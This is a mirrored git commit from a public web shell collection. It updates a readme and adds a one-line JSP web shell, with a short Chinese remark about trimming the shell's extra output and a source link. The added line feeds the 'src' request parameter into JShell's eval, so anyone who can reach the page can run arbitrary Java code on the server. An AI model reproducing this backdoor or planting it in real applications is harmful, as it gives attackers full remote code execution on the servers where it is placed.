mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Update readme.md
This commit is contained in:
@@ -6,5 +6,8 @@ readme
|
||||
|
||||
如果强迫症想撸掉多余的输出:
|
||||
|
||||
|
||||
```
|
||||
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>
|
||||
```
|
||||
|
||||
from: http://p2j.cn/?p=1874
|
||||
|
||||
Reference in New Issue
Block a user